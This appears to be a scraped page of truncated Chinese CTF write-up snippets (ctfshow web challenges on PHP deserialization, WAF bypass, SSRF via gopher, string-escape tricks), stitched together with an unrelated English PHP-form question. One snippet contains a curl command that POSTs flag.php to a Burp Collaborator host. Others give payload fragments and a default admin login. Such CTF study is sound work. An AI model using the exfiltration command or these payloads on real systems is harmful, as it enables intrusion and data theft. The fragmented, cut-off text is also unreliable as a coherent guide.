本文只是给自己做参考,想要看完整的可以搜搜元旦赛的easyweb。 点击查看代码 functionwaf_in_waf_php($a){$count=substr_count($a,'base64');echo"hinthinthint,base64喔"."";if($count!=1){returnTrue; }if(preg_match('/ucs-2|phar|data|input|zip|flag|\%/i',$a)){returnTrue; }else{returnf...
easy_unserialize 简单分析可以发现是反序列化,还有ini_set。 发现默认写入setting.inc,写入的内容还要在反序列化一次。 非预期解: 先看ini_set可以设定的值里有一个error_log 这里代表报错信息会写入我们设定的文件里。 那么怎么构造脚本错误呢,这里利用un
简介: CTfshow 卷王杯 easy unserialize(特详) 考点:__destruct函数的GC回收机制、php反序列化的一些冷门知识点源码:<?php class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { ...
F=`$F` ;curl -X POST -F xx=@flag.php http://nkbdydku0o5akpn25qepeqaii9o8cx.burpcollaborator.net//无换行//其中-F 为带文件的形式发送post请求//xx是上传文件的name值,flag.php就是上传的文件 正常无回显做法 1、写入文件。经过测试没有写文件权限。 2、dnslog外带 平台打不开了,nnd,这个方...
3.Ezzz_php mb_strpos()和mb_strpos()在解析字符串时对特殊字符截取偏差导致的字符串逃逸 参考:https://www.cnblogs.com/gxngxngxn/p/18187578 简单来说就是,%9f增加一个字符,%f0减少一个字符 那么需要逃逸多少个字符就要增加多少个%9f 故构造
主要看他会加上.inc,因此一开始我们写入settings.inc目标php语句 再执行该函数,包含settings.inc payload: 写入 <?phpclasssettings{ }classmain {public$settings;public$params;public$a;public$b;publicfunction __construct() { $this->params=serialize( ...
easy_php(复现) 题解:https://www.yuque.com/boogipop/tdotcs/hobe2yqmb3kgy1l8,Boogipop师傅tql 代码语言:javascript 代码运行次数:0 运行 AI代码解释 <?php error_reporting(0); highlight_file(__FILE__); class ctfshow{ public function __wakeup(){ die("not allowed!"); } public function __...
默认后台地址:http://your-domain/system1103/login.php 默认用户名:admin 默认密码:admin1103 web14 hint:有时候源码里面就能不经意间泄露重要(editor)的信息,默认配置害死人 根据提示 泄露重要(editor)的信息 直接在url后面添加/editor 然后选择上传图片按钮 查看flag路径并且访问 ...
very_easy_sql 这个题目有点奇怪的,开局看注释转到use.php判断SSRF没什么问题,但是好像没人提到是如何发现注入点在cookie的?我猜测应该是看cookie的回显判断出来的= = 收一手别人的gopher格式的python代码: importurllib.parsehost="127.0.0.1:80"content="uname=admin&passwd=admin"content_length=len(content)test=...
PHP form not submitting but not showing any errors I am trying to set up a really simple coming-soon page with a contact form. I have uploaded everything here (click contact us now button). Now, when I fill in the information and click send, it will g... ...